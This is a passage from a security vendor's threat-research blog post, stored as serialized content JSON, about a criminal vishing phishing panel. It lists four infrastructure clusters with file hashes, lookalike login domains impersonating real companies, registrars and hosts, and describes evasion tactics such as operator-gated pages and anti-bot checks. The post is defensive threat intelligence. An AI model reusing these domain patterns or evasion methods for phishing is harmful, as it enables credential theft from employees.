clone:",[],{},{"nodeType":292,"data":3861,"content":3865},{"target":3862},{"sys":3863},{"id":3864,"type":297,"linkType":298},"1WCd5LQ6cfPf1IsNAhPSIT",[],{"nodeType":237,"data":3867,"content":3868},{},[3869],{"nodeType":241,"value":3870,"marks":3871,"data":3872},"The cloned Microsoft login pages displayed previously contain terser comments, but still typical of useless comments that are included by an LLM rather than a human author, especially a 
malware/phishing author:",[],{},{"nodeType":292,"data":3874,"content":3878},{"target":3875},{"sys":3876},{"id":3877,"type":297,"linkType":298},"6WN59mkiscNmAt8dmOR81c",[],{"nodeType":237,"data":3880,"content":3881},{},[3882],{"nodeType":241,"value":3883,"marks":3884,"data":3885},"The broken duplication in the heartbeat variant — where an inline script and client.js independently schedule the same backend requests using slightly different data formats — is consistent with an operator pasting requirements into an LLM and accepting the output without understanding the existing codebase well enough to recognize the redundancy.",[],{},{"nodeType":237,"data":3887,"content":3888},{},[3889],{"nodeType":241,"value":3890,"marks":3891,"data":3892},"Clearly, the barrier to entry for building (or forking) and operating a real-time vishing phishing panel is lower than the effectiveness of the tooling might suggest.",[],{},{"nodeType":320,"data":3894,"content":3895},{},[],{"nodeType":324,"data":3897,"content":3898},{},[3899],{"nodeType":241,"value":3900,"marks":3901,"data":3903},"Infrastructure clustering and attribution",[3902],{"type":313},{},{"nodeType":237,"data":3905,"content":3906},{},[3907,3911,3916],{"nodeType":241,"value":3908,"marks":3909,"data":3910},"Through analysis of phishing domains, hosting infrastructure, and technical indicators in the panel source code, ",[],{},{"nodeType":241,"value":3912,"marks":3913,"data":3915},"we’re highlighting four distinct infrastructure clusters associated with this tooling. 
",[3914],{"type":313},{},{"nodeType":241,"value":3917,"marks":3918,"data":3919},"While the panels share common heritage, the operators deploying them appear to be separate groups with different infrastructure preferences and operational patterns.",[],{},{"nodeType":605,"data":3921,"content":3922},{},[3923],{"nodeType":241,"value":3924,"marks":3925,"data":3926},"Cluster A",[],{},{"nodeType":237,"data":3928,"content":3929},{},[3930,3934,3943],{"nodeType":241,"value":3931,"marks":3932,"data":3933},"The indicators for Cluster A overlap with ",[],{},{"nodeType":260,"data":3935,"content":3937},{"uri":3936},"https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft",[3938],{"nodeType":241,"value":3939,"marks":3940,"data":3942},"Mandiant’s reporting on UNC6661",[3941],{"type":573},{},{"nodeType":241,"value":3944,"marks":3945,"data":3946},". Mandiant also attributes the extortion activity following UNC6661 intrusions to UNC6240, aka ShinyHunters.",[],{},{"nodeType":917,"data":3948,"content":3949},{},[3950,3974,4003,4026,4077,4121,4144,4167],{"nodeType":921,"data":3951,"content":3952},{},[3953,3964],{"nodeType":951,"data":3954,"content":3955},{},[3956],{"nodeType":237,"data":3957,"content":3958},{},[3959],{"nodeType":241,"value":3960,"marks":3961,"data":3963},"Tool",[3962],{"type":313},{},{"nodeType":951,"data":3965,"content":3966},{},[3967],{"nodeType":237,"data":3968,"content":3969},{},[3970],{"nodeType":241,"value":3456,"marks":3971,"data":3973},[3972],{"type":313},{},{"nodeType":921,"data":3975,"content":3976},{},[3977,3986],{"nodeType":951,"data":3978,"content":3979},{},[3980],{"nodeType":237,"data":3981,"content":3982},{},[3983],{"nodeType":241,"value":3484,"marks":3984,"data":3985},[],{},{"nodeType":951,"data":3987,"content":3988},{},[3989,3996],{"nodeType":237,"data":3990,"content":3991},{},[3992],{"nodeType":241,"value":3993,"marks":3994,"data":3995},"8a01bcb70ec1c101a163c9cb8e074781c1322096f7ae01789f02252854def44c",[],{},{"nodeT
ype":237,"data":3997,"content":3998},{},[3999],{"nodeType":241,"value":4000,"marks":4001,"data":4002},"f574b6e6b3a968cda5f51bec2c090d8eb095fbcfc383314f94bc15676a0d6692",[],{},{"nodeType":921,"data":4004,"content":4005},{},[4006,4016],{"nodeType":951,"data":4007,"content":4008},{},[4009],{"nodeType":237,"data":4010,"content":4011},{},[4012],{"nodeType":241,"value":4013,"marks":4014,"data":4015},"Timeframe",[],{},{"nodeType":951,"data":4017,"content":4018},{},[4019],{"nodeType":237,"data":4020,"content":4021},{},[4022],{"nodeType":241,"value":4023,"marks":4024,"data":4025},"November 2025 - present (April 2026)",[],{},{"nodeType":921,"data":4027,"content":4028},{},[4029,4039],{"nodeType":951,"data":4030,"content":4031},{},[4032],{"nodeType":237,"data":4033,"content":4034},{},[4035],{"nodeType":241,"value":4036,"marks":4037,"data":4038},"Domain Patterns",[],{},{"nodeType":951,"data":4040,"content":4041},{},[4042,4049,4056,4063,4070],{"nodeType":237,"data":4043,"content":4044},{},[4045],{"nodeType":241,"value":4046,"marks":4047,"data":4048},"\u003Ctarget>internal.com\n\u003Ctarget>sso.com",[],{},{"nodeType":237,"data":4050,"content":4051},{},[4052],{"nodeType":241,"value":4053,"marks":4054,"data":4055},"my\u003Ctarget>.com",[],{},{"nodeType":237,"data":4057,"content":4058},{},[4059],{"nodeType":241,"value":4060,"marks":4061,"data":4062},"my\u003Ctarget>internal.com",[],{},{"nodeType":237,"data":4064,"content":4065},{},[4066],{"nodeType":241,"value":4067,"marks":4068,"data":4069},"my\u003Ctarget>manager.com",[],{},{"nodeType":237,"data":4071,"content":4072},{},[4073],{"nodeType":241,"value":4074,"marks":4075,"data":4076},"my\u003Ctarget>sso.com",[],{},{"nodeType":921,"data":4078,"content":4079},{},[4080,4090],{"nodeType":951,"data":4081,"content":4082},{},[4083],{"nodeType":237,"data":4084,"content":4085},{},[4086],{"nodeType":241,"value":4087,"marks":4088,"data":4089},"Examples",[],{},{"nodeType":951,"data":4091,"content":4092},{},[4093,4100,4107,4114],{"nodeType":237,"d
ata":4094,"content":4095},{},[4096],{"nodeType":241,"value":4097,"marks":4098,"data":4099},"mydropboxinternal.com (November 2025)",[],{},{"nodeType":237,"data":4101,"content":4102},{},[4103],{"nodeType":241,"value":4104,"marks":4105,"data":4106},"myxerointernal.com (December 2025)",[],{},{"nodeType":237,"data":4108,"content":4109},{},[4110],{"nodeType":241,"value":4111,"marks":4112,"data":4113},"amazoninternal.com (March 2026)",[],{},{"nodeType":237,"data":4115,"content":4116},{},[4117],{"nodeType":241,"value":4118,"marks":4119,"data":4120},"mydisneysso.com (March 2026)",[],{},{"nodeType":921,"data":4122,"content":4123},{},[4124,4134],{"nodeType":951,"data":4125,"content":4126},{},[4127],{"nodeType":237,"data":4128,"content":4129},{},[4130],{"nodeType":241,"value":4131,"marks":4132,"data":4133},"Registrar",[],{},{"nodeType":951,"data":4135,"content":4136},{},[4137],{"nodeType":237,"data":4138,"content":4139},{},[4140],{"nodeType":241,"value":4141,"marks":4142,"data":4143},"NiceNIC",[],{},{"nodeType":921,"data":4145,"content":4146},{},[4147,4157],{"nodeType":951,"data":4148,"content":4149},{},[4150],{"nodeType":237,"data":4151,"content":4152},{},[4153],{"nodeType":241,"value":4154,"marks":4155,"data":4156},"Name Servers",[],{},{"nodeType":951,"data":4158,"content":4159},{},[4160],{"nodeType":237,"data":4161,"content":4162},{},[4163],{"nodeType":241,"value":4164,"marks":4165,"data":4166},"1984.is FreeDNS",[],{},{"nodeType":921,"data":4168,"content":4169},{},[4170,4180],{"nodeType":951,"data":4171,"content":4172},{},[4173],{"nodeType":237,"data":4174,"content":4175},{},[4176],{"nodeType":241,"value":4177,"marks":4178,"data":4179},"Hosting Provider",[],{},{"nodeType":951,"data":4181,"content":4182},{},[4183],{"nodeType":237,"data":4184,"content":4185},{},[4186],{"nodeType":241,"value":4187,"marks":4188,"data":4189},"Mevspace (AS201814)",[],{},{"nodeType":605,"data":4191,"content":4192},{},[4193],{"nodeType":241,"value":4194,"marks":4195,"data":4196},"Cluster 
B",[],{},{"nodeType":237,"data":4198,"content":4199},{},[4200,4204,4212,4216,4225],{"nodeType":241,"value":4201,"marks":4202,"data":4203},"The indicators for Cluster B overlap with ",[],{},{"nodeType":260,"data":4205,"content":4206},{"uri":3936},[4207],{"nodeType":241,"value":4208,"marks":4209,"data":4211},"Mandiant’s reporting on UNC6671",[4210],{"type":573},{},{"nodeType":241,"value":4213,"marks":4214,"data":4215},". ",[],{},{"nodeType":260,"data":4217,"content":4219},{"uri":4218},"https://rhisac.org/threat-intelligence/extortion-in-the-enterprise-defending-against-blackfile-attacks/",[4220],{"nodeType":241,"value":4221,"marks":4222,"data":4224},"Other external reporting",[4223],{"type":573},{},{"nodeType":241,"value":4226,"marks":4227,"data":4228}," has linked this group to BlackFile-branded extortion and leaks.",[],{},{"nodeType":917,"data":4230,"content":4231},{},[4232,4255,4298,4320,4355,4398,4420,4442],{"nodeType":921,"data":4233,"content":4234},{},[4235,4245],{"nodeType":951,"data":4236,"content":4237},{},[4238],{"nodeType":237,"data":4239,"content":4240},{},[4241],{"nodeType":241,"value":3960,"marks":4242,"data":4244},[4243],{"type":313},{},{"nodeType":951,"data":4246,"content":4247},{},[4248],{"nodeType":237,"data":4249,"content":4250},{},[4251],{"nodeType":241,"value":3582,"marks":4252,"data":4254},[4253],{"type":313},{},{"nodeType":921,"data":4256,"content":4257},{},[4258,4267],{"nodeType":951,"data":4259,"content":4260},{},[4261],{"nodeType":237,"data":4262,"content":4263},{},[4264],{"nodeType":241,"value":3484,"marks":4265,"data":4266},[],{},{"nodeType":951,"data":4268,"content":4269},{},[4270,4277,4284,4291],{"nodeType":237,"data":4271,"content":4272},{},[4273],{"nodeType":241,"value":4274,"marks":4275,"data":4276},"c0df36ccf88d5c8434b13b58f7a55a9715643a126148b9d078a93075d09cad26",[],{},{"nodeType":237,"data":4278,"content":4279},{},[4280],{"nodeType":241,"value":4281,"marks":4282,"data":4283},"d178dc7108fa9344dae28e350e810352e9e874563496dc7876ee628b1
1b0eabb",[],{},{"nodeType":237,"data":4285,"content":4286},{},[4287],{"nodeType":241,"value":4288,"marks":4289,"data":4290},"9c0939960e49122196e44b6779fe55dd7a13ab437ce251c8cf35f8c6daf8be21",[],{},{"nodeType":237,"data":4292,"content":4293},{},[4294],{"nodeType":241,"value":4295,"marks":4296,"data":4297},"e8128b33259f7ea4313c942689ba0ba557f17b1474f2e621c62a5b77674fab86",[],{},{"nodeType":921,"data":4299,"content":4300},{},[4301,4310],{"nodeType":951,"data":4302,"content":4303},{},[4304],{"nodeType":237,"data":4305,"content":4306},{},[4307],{"nodeType":241,"value":4013,"marks":4308,"data":4309},[],{},{"nodeType":951,"data":4311,"content":4312},{},[4313],{"nodeType":237,"data":4314,"content":4315},{},[4316],{"nodeType":241,"value":4317,"marks":4318,"data":4319},"January 2026",[],{},{"nodeType":921,"data":4321,"content":4322},{},[4323,4332],{"nodeType":951,"data":4324,"content":4325},{},[4326],{"nodeType":237,"data":4327,"content":4328},{},[4329],{"nodeType":241,"value":4036,"marks":4330,"data":4331},[],{},{"nodeType":951,"data":4333,"content":4334},{},[4335,4342,4349],{"nodeType":237,"data":4336,"content":4337},{},[4338],{"nodeType":241,"value":4339,"marks":4340,"data":4341},"\u003Ctarget>internal.com",[],{},{"nodeType":237,"data":4343,"content":4344},{},[4345],{"nodeType":241,"value":4346,"marks":4347,"data":4348},"\u003Ctarget>sso.com",[],{},{"nodeType":237,"data":4350,"content":4351},{},[4352],{"nodeType":241,"value":4074,"marks":4353,"data":4354},[],{},{"nodeType":921,"data":4356,"content":4357},{},[4358,4367],{"nodeType":951,"data":4359,"content":4360},{},[4361],{"nodeType":237,"data":4362,"content":4363},{},[4364],{"nodeType":241,"value":4087,"marks":4365,"data":4366},[],{},{"nodeType":951,"data":4368,"content":4369},{},[4370,4377,4384,4391],{"nodeType":237,"data":4371,"content":4372},{},[4373],{"nodeType":241,"value":4374,"marks":4375,"data":4376},"epicgamessso[.]com (December 
2025)",[],{},{"nodeType":237,"data":4378,"content":4379},{},[4380],{"nodeType":241,"value":4381,"marks":4382,"data":4383},"myadyeninternal[.]com (January 2026)",[],{},{"nodeType":237,"data":4385,"content":4386},{},[4387],{"nodeType":241,"value":4388,"marks":4389,"data":4390},"mysonossso[.]com (January 2026)",[],{},{"nodeType":237,"data":4392,"content":4393},{},[4394],{"nodeType":241,"value":4395,"marks":4396,"data":4397},"sonosinternal[.]com (January 2026)",[],{},{"nodeType":921,"data":4399,"content":4400},{},[4401,4410],{"nodeType":951,"data":4402,"content":4403},{},[4404],{"nodeType":237,"data":4405,"content":4406},{},[4407],{"nodeType":241,"value":4131,"marks":4408,"data":4409},[],{},{"nodeType":951,"data":4411,"content":4412},{},[4413],{"nodeType":237,"data":4414,"content":4415},{},[4416],{"nodeType":241,"value":4417,"marks":4418,"data":4419},"Tucows",[],{},{"nodeType":921,"data":4421,"content":4422},{},[4423,4432],{"nodeType":951,"data":4424,"content":4425},{},[4426],{"nodeType":237,"data":4427,"content":4428},{},[4429],{"nodeType":241,"value":4154,"marks":4430,"data":4431},[],{},{"nodeType":951,"data":4433,"content":4434},{},[4435],{"nodeType":237,"data":4436,"content":4437},{},[4438],{"nodeType":241,"value":4439,"marks":4440,"data":4441},"Njalla",[],{},{"nodeType":921,"data":4443,"content":4444},{},[4445,4454],{"nodeType":951,"data":4446,"content":4447},{},[4448],{"nodeType":237,"data":4449,"content":4450},{},[4451],{"nodeType":241,"value":4177,"marks":4452,"data":4453},[],{},{"nodeType":951,"data":4455,"content":4456},{},[4457],{"nodeType":237,"data":4458,"content":4459},{},[4460],{"nodeType":241,"value":4461,"marks":4462,"data":4463},"Njalla (AS39287)",[],{},{"nodeType":605,"data":4465,"content":4466},{},[4467],{"nodeType":241,"value":4468,"marks":4469,"data":4470},"Cluster C",[],{},{"nodeType":237,"data":4472,"content":4473},{},[4474],{"nodeType":241,"value":4475,"marks":4476,"data":4477},"Cluster C is likely an evolution of Cluster B. 
Some evidence has been observed tying the backend hosting to Njalla behind the Cloudflare CDN further solidifying the link. The shift to Cloudflare Turnstile protection and subdomain-based targeting represents an operational refinement — moving away from the distinctive [target]internal[.]com pattern that had become a well-known campaign indicator.",[],{},{"nodeType":917,"data":4479,"content":4480},{},[4481,4505,4527,4549,4571,4614,4635,4657],{"nodeType":921,"data":4482,"content":4483},{},[4484,4494],{"nodeType":951,"data":4485,"content":4486},{},[4487],{"nodeType":237,"data":4488,"content":4489},{},[4490],{"nodeType":241,"value":3960,"marks":4491,"data":4493},[4492],{"type":313},{},{"nodeType":951,"data":4495,"content":4496},{},[4497],{"nodeType":237,"data":4498,"content":4499},{},[4500],{"nodeType":241,"value":4501,"marks":4502,"data":4504},"heartbeat/check_redirect variant protected with Cloudflare turnstile",[4503],{"type":313},{},{"nodeType":921,"data":4506,"content":4507},{},[4508,4517],{"nodeType":951,"data":4509,"content":4510},{},[4511],{"nodeType":237,"data":4512,"content":4513},{},[4514],{"nodeType":241,"value":3484,"marks":4515,"data":4516},[],{},{"nodeType":951,"data":4518,"content":4519},{},[4520],{"nodeType":237,"data":4521,"content":4522},{},[4523],{"nodeType":241,"value":4524,"marks":4525,"data":4526},"cb1d409278b2247af23e7b00ac779b232baaf4ce5f63fdf5ebc3920a38cc6102",[],{},{"nodeType":921,"data":4528,"content":4529},{},[4530,4539],{"nodeType":951,"data":4531,"content":4532},{},[4533],{"nodeType":237,"data":4534,"content":4535},{},[4536],{"nodeType":241,"value":4013,"marks":4537,"data":4538},[],{},{"nodeType":951,"data":4540,"content":4541},{},[4542],{"nodeType":237,"data":4543,"content":4544},{},[4545],{"nodeType":241,"value":4546,"marks":4547,"data":4548},"March 2026 - present (April 
2026)",[],{},{"nodeType":921,"data":4550,"content":4551},{},[4552,4561],{"nodeType":951,"data":4553,"content":4554},{},[4555],{"nodeType":237,"data":4556,"content":4557},{},[4558],{"nodeType":241,"value":4036,"marks":4559,"data":4560},[],{},{"nodeType":951,"data":4562,"content":4563},{},[4564],{"nodeType":237,"data":4565,"content":4566},{},[4567],{"nodeType":241,"value":4568,"marks":4569,"data":4570},"\u003Ctarget> subdomain with generic “sso”, “passkey”, “enroll”, “okta” theme root domain",[],{},{"nodeType":921,"data":4572,"content":4573},{},[4574,4583],{"nodeType":951,"data":4575,"content":4576},{},[4577],{"nodeType":237,"data":4578,"content":4579},{},[4580],{"nodeType":241,"value":4087,"marks":4581,"data":4582},[],{},{"nodeType":951,"data":4584,"content":4585},{},[4586,4593,4600,4607],{"nodeType":237,"data":4587,"content":4588},{},[4589],{"nodeType":241,"value":4590,"marks":4591,"data":4592},"\u003Ctarget>.passkeysetup.com (March 2026)",[],{},{"nodeType":237,"data":4594,"content":4595},{},[4596],{"nodeType":241,"value":4597,"marks":4598,"data":4599},"\u003Ctarget>.enrollms.com (March 2026)",[],{},{"nodeType":237,"data":4601,"content":4602},{},[4603],{"nodeType":241,"value":4604,"marks":4605,"data":4606},"\u003Ctarget>.keyokta.com (April 2026)",[],{},{"nodeType":237,"data":4608,"content":4609},{},[4610],{"nodeType":241,"value":4611,"marks":4612,"data":4613},"\u003Ctarget>.passkeywork.com (April 
2026)",[],{},{"nodeType":921,"data":4615,"content":4616},{},[4617,4626],{"nodeType":951,"data":4618,"content":4619},{},[4620],{"nodeType":237,"data":4621,"content":4622},{},[4623],{"nodeType":241,"value":4131,"marks":4624,"data":4625},[],{},{"nodeType":951,"data":4627,"content":4628},{},[4629],{"nodeType":237,"data":4630,"content":4631},{},[4632],{"nodeType":241,"value":4417,"marks":4633,"data":4634},[],{},{"nodeType":921,"data":4636,"content":4637},{},[4638,4647],{"nodeType":951,"data":4639,"content":4640},{},[4641],{"nodeType":237,"data":4642,"content":4643},{},[4644],{"nodeType":241,"value":4154,"marks":4645,"data":4646},[],{},{"nodeType":951,"data":4648,"content":4649},{},[4650],{"nodeType":237,"data":4651,"content":4652},{},[4653],{"nodeType":241,"value":4654,"marks":4655,"data":4656},"Cloudflare",[],{},{"nodeType":921,"data":4658,"content":4659},{},[4660,4669],{"nodeType":951,"data":4661,"content":4662},{},[4663],{"nodeType":237,"data":4664,"content":4665},{},[4666],{"nodeType":241,"value":4177,"marks":4667,"data":4668},[],{},{"nodeType":951,"data":4670,"content":4671},{},[4672],{"nodeType":237,"data":4673,"content":4674},{},[4675],{"nodeType":241,"value":4676,"marks":4677,"data":4678},"Cloudflare (AS13335)",[],{},{"nodeType":605,"data":4680,"content":4681},{},[4682],{"nodeType":241,"value":4683,"marks":4684,"data":4685},"Cluster D",[],{},{"nodeType":917,"data":4687,"content":4688},{},[4689,4713,4735,4757,4779,4808,4829,4850],{"nodeType":921,"data":4690,"content":4691},{},[4692,4702],{"nodeType":951,"data":4693,"content":4694},{},[4695],{"nodeType":237,"data":4696,"content":4697},{},[4698],{"nodeType":241,"value":3960,"marks":4699,"data":4701},[4700],{"type":313},{},{"nodeType":951,"data":4703,"content":4704},{},[4705],{"nodeType":237,"data":4706,"content":4707},{},[4708],{"nodeType":241,"value":4709,"marks":4710,"data":4712},"heartbeat/check_redirect variant 
(minified)",[4711],{"type":313},{},{"nodeType":921,"data":4714,"content":4715},{},[4716,4725],{"nodeType":951,"data":4717,"content":4718},{},[4719],{"nodeType":237,"data":4720,"content":4721},{},[4722],{"nodeType":241,"value":3484,"marks":4723,"data":4724},[],{},{"nodeType":951,"data":4726,"content":4727},{},[4728],{"nodeType":237,"data":4729,"content":4730},{},[4731],{"nodeType":241,"value":4732,"marks":4733,"data":4734},"9d65dd34384b441505e6b67647153c02d5c367bb53da36ce36a392e70b37940a",[],{},{"nodeType":921,"data":4736,"content":4737},{},[4738,4747],{"nodeType":951,"data":4739,"content":4740},{},[4741],{"nodeType":237,"data":4742,"content":4743},{},[4744],{"nodeType":241,"value":4013,"marks":4745,"data":4746},[],{},{"nodeType":951,"data":4748,"content":4749},{},[4750],{"nodeType":237,"data":4751,"content":4752},{},[4753],{"nodeType":241,"value":4754,"marks":4755,"data":4756},"April 2026 (low volume)",[],{},{"nodeType":921,"data":4758,"content":4759},{},[4760,4769],{"nodeType":951,"data":4761,"content":4762},{},[4763],{"nodeType":237,"data":4764,"content":4765},{},[4766],{"nodeType":241,"value":4036,"marks":4767,"data":4768},[],{},{"nodeType":951,"data":4770,"content":4771},{},[4772],{"nodeType":237,"data":4773,"content":4774},{},[4775],{"nodeType":241,"value":4776,"marks":4777,"data":4778},"\u003Ctarget> subdomain with generic “passkey”, “portal”, “okta” theme root 
domain",[],{},{"nodeType":921,"data":4780,"content":4781},{},[4782,4791],{"nodeType":951,"data":4783,"content":4784},{},[4785],{"nodeType":237,"data":4786,"content":4787},{},[4788],{"nodeType":241,"value":4087,"marks":4789,"data":4790},[],{},{"nodeType":951,"data":4792,"content":4793},{},[4794,4801],{"nodeType":237,"data":4795,"content":4796},{},[4797],{"nodeType":241,"value":4798,"marks":4799,"data":4800},"\u003Ctarget>.passkeyportalsetup.com",[],{},{"nodeType":237,"data":4802,"content":4803},{},[4804],{"nodeType":241,"value":4805,"marks":4806,"data":4807},"\u003Ctarget>.addoktapasskey.com",[],{},{"nodeType":921,"data":4809,"content":4810},{},[4811,4820],{"nodeType":951,"data":4812,"content":4813},{},[4814],{"nodeType":237,"data":4815,"content":4816},{},[4817],{"nodeType":241,"value":4131,"marks":4818,"data":4819},[],{},{"nodeType":951,"data":4821,"content":4822},{},[4823],{"nodeType":237,"data":4824,"content":4825},{},[4826],{"nodeType":241,"value":4141,"marks":4827,"data":4828},[],{},{"nodeType":921,"data":4830,"content":4831},{},[4832,4841],{"nodeType":951,"data":4833,"content":4834},{},[4835],{"nodeType":237,"data":4836,"content":4837},{},[4838],{"nodeType":241,"value":4154,"marks":4839,"data":4840},[],{},{"nodeType":951,"data":4842,"content":4843},{},[4844],{"nodeType":237,"data":4845,"content":4846},{},[4847],{"nodeType":241,"value":4654,"marks":4848,"data":4849},[],{},{"nodeType":921,"data":4851,"content":4852},{},[4853,4862],{"nodeType":951,"data":4854,"content":4855},{},[4856],{"nodeType":237,"data":4857,"content":4858},{},[4859],{"nodeType":241,"value":4177,"marks":4860,"data":4861},[],{},{"nodeType":951,"data":4863,"content":4864},{},[4865],{"nodeType":237,"data":4866,"content":4867},{},[4868],{"nodeType":241,"value":4676,"marks":4869,"data":4870},[],{},{"nodeType":320,"data":4872,"content":4873},{},[],{"nodeType":324,"data":4875,"content":4876},{},[4877],{"nodeType":241,"value":4878,"marks":4879,"data":4881},"Detection 
considerations",[4880],{"type":313},{},{"nodeType":237,"data":4883,"content":4884},{},[4885],{"nodeType":241,"value":4886,"marks":4887,"data":4888},"For Push, the detection approach to these panels is fundamentally the same as for any other phishing kit — behavioral analysis of the rendered page in the browser, regardless of the C2 protocol running underneath. ",[],{},{"nodeType":237,"data":4890,"content":4891},{},[4892],{"nodeType":241,"value":4893,"marks":4894,"data":4895},"The main operational difference is on the operator end, where the human-in-the-loop interaction replaces fully automated credential harvesting. This has implications for defenders relying on proactive infrastructure scanning: the gated landing pages, anti-bot checks, and operator-approval requirements mean the malicious content is only served to active targets, making it significantly harder for automated scanners to discover and flag these domains before they're used against a victim.",[],{},{"nodeType":237,"data":4897,"content":4898},{},[4899,4904],{"nodeType":241,"value":4900,"marks":4901,"data":4903},"The phone call as delivery vector eliminates the email-based detection surface that most organizations rely on as their primary phishing defense. ",[4902],{"type":313},{},{"nodeType":241,"value":4905,"marks":4906,"data":4907},"Operator-gated payload delivery further reduces the likelihood that these sites will be flagged as malicious and added to known-bad detection lists (and in any case, it’s trivial for attackers to spin up new ones). This reinforces the need for browser-based detection at the point the user interacts with the page, analyzing it in real time for malicious content without relying on static IoCs. 
",[],{},{"nodeType":320,"data":4909,"content":4910},{},[],{"nodeType":324,"data":4912,"content":4913},{},[4914],{"nodeType":241,"value":886,"marks":4915,"data":4917},[4916],{"type":313},{},{"nodeType":237,"data":4919,"content":4920},{},[4921,4925,4931],{"nodeType":241,"value":4922,"marks":4923,"data":4924},"Short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":260,"data":4926,"content":4927},{"uri":899},[4928],{"nodeType":241,"value":902,"marks":4929,"data":4930},[],{},{"nodeType":241,"value":4932,"marks":4933,"data":4934}," in the attack chain, often dynamically serving different URLs to site visitors. ",[],{},{"nodeType":237,"data":4936,"content":4937},{},[4938,4941,4949],{"nodeType":241,"value":29,"marks":4939,"data":4940},[],{},{"nodeType":260,"data":4942,"content":4944},{"uri":4943},"https://www.virustotal.com/gui/collection/0f745e9da6ef7664444594a7ee930cfe5a9d8bd6c2f039dcde818599b8926610",[4945],{"nodeType":241,"value":4946,"marks":4947,"data":4948},"The full list of IoCs is on VirusTotal here. ",[],{},{"nodeType":241,"value":29,"marks":4950,"data":4951},[],{},{"nodeType":237,"data":4953,"content":4954},{},[4955],{"nodeType":241,"value":841,"marks":4956,"data":4958},[4957],{"type":313},{},{"nodeType":320,"data":4960,"content":4961},{},[],{"nodeType":324,"data":4963,"content":4964},{},[4965],{"nodeType":241,"value":4966,"marks":4967,"data":4969},"Learn more about Push",[4968],{"type":313},{},{"nodeType":237,"data":4971,"content":4972},{},[4973,4977,4984],{"nodeType":241,"value":4974,"marks":4975,"data":4976},"Push Security is the most powerful AI-native security tool in the browser. 
Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.\n\nSecurity teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.\n\nBook a ",[],{},{"nodeType":260,"data":4978,"content":4979},{"uri":2023},[4980],{"nodeType":241,"value":4981,"marks":4982,"data":4983},"live demo",[],{},{"nodeType":241,"value":2032,"marks":4985,"data":4986},[],{},"We infiltrated a criminal phishing panel: here’s what we found","We got an inside look at a phishing panel used in criminal campaigns linked to operators like ShinyHunters and BlackFile. Here’s what we found.","inside-criminal-phishing-panel",{"items":4991},[4992,4994],{"sys":4993,"name":2041},{"id":2040},{"sys":4995,"name":2045},{"id":2044},{"items":4997},[4998],{"fullName":4999,"firstName":5000,"jobTitle":2051,"profilePicture":5001},"Push Security Research Team","Research",{"url":5002},"https://images.ctfassets.net/y1cdw1ablpvd/7LpkwyXbOZ8WCVTAXzULmC/bfa3634c78ee9dfbee6606ba5519918b/push-round.png","llmshare-malvertising-campaign","blog/llmshare-malvertising-campaign",{"json":5006},{"data":5007,"content":5008,"nodeType":233},{},[5009],{"data":5010,"content":5011,"nodeType":237},{},[5012],{"data":5013,"marks":5014,"value":5015,"nodeType":241},{},[],"Attackers are abusing the shared content features of AI chatbot platforms — ChatGPT and Claude — to deliver malware through pages hosted on legitimate, trusted domains, distributing the malicious links via sponsored malvertising ads on search engines. 
","How attackers are using shared content features on AI chatbot platforms to deliver malware via pages hosted on legitimate domains, distributed via malvertising.",{"id":5018,"publishedAt":5019},"Gcg7PGuICrlRcqq1QFXxH","2026-05-29T12:35:20.950Z",{"items":5021},[5022,5024],{"sys":5023,"name":2041},{"id":2040},{"sys":5025,"name":2045},{"id":2044},"khEBPnrZWZ6HhFHnS9uksY9HY5NPHXhNH6Akdim7Dxc",1780064627794]